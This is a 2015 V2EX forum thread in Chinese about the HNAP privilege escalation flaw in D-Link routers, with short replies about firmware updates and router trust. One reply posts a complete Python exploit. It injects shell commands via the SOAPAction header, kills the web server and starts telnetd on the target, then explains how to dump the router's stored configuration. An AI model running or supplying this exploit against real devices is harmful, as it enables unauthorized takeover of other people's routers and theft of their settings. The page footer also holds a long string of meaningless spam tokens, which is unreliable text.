各大无线路由器品牌暴漏洞 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
davidyin
40.34D
13.16D
V2EX    分享发现

各大无线路由器品牌暴漏洞

  •  
  •   davidyin 2015 年 6 月 3 日 4210 次点击
    这是一个创建于 3875 天前的主题,其中的信息可能已经有所发展或是发生改变。
    HNAP Privilege Escalation Vulnerability
    看看自己的路由器有没有出更新的固件。

    先去更新我的 D-Link Dir-850L
    7 条回复    2015-06-03 14:39:32 +08:00
    lhbc
        1
    lhbc  
       2015 年 6 月 3 日 via Android
    国产的全都有后门,还用查……
    princeofwales
        2
    princeofwales  
       2015 年 6 月 3 日
    网件的会不会有问题,美帝的
    就是怕了国产的,再便宜都不想买
    lee015
        3
    lee015  
       2015 年 6 月 3 日 via Android
    刷了开源固件还会有问题吗?
    ledzep2
        4
    ledzep2  
       2015 年 6 月 3 日
    现在电信联通连个公网ip都不给, 想访问都找不着. 洗洗睡...
    Karblue
        5
    Karblue  
       2015 年 6 月 3 日
    不是只影响Dlink么。国内厂商好像没有躺枪吧
    Karblue
        6
    Karblue  
       2015 年 6 月 3 日
    #!/usr/bin/env python

    import sys
    import urllib2
    import httplib

    try:
    ip_port = sys.argv[1].split(':')
    ip = ip_port[0]

    if len(ip_port) == 2:
    port = ip_port[1]
    elif len(ip_port) == 1:
    port = "80"
    else:
    raise IndexError
    except IndexError:
    print "Usage: %s <target ip:port>" % sys.argv[0]
    sys.exit(1)

    url = "http://%s:%s/HNAP1" % (ip, port)
    # NOTE: If exploiting from the LAN, telnetd can be started on
    # any port; killing the http server and re-using its port
    # is not necessary.
    #
    # Killing off all hung hnap processes ensures that we can
    # re-start httpd later.
    command = "killall httpd; killall hnap; telnetd -p %s" % port
    headers = {
    "SOAPAction" : '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % command,
    }

    req = urllib2.Request(url, None, headers)
    try:
    urllib2.urlopen(req)
    raise Exception("Unexpected response")
    except httplib.BadStatusLine:
    print "Exploit sent, try telnetting to %s:%s!" % (ip, port)
    print "To dump all system settings, run (no quotes): 'xmldbc -d /var/config.xml; cat /var/config.xml'"
    sys.exit(0)
    except Exception:
    print "Received an unexpected response from the server; exploit probably failed. :("



    POC在此。从devttsy0大神po来的
    Karblue
        7
    Karblue  
       2015 年 6 月 3 日
    还发现了devttsy0的吐槽。吐槽Dlink的补丁。看了一下神tm补丁打的真是捉急
    http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     2633 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 28ms UTC 02:56 PVG 10:56 LAX 18:56 JFK 21:56
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86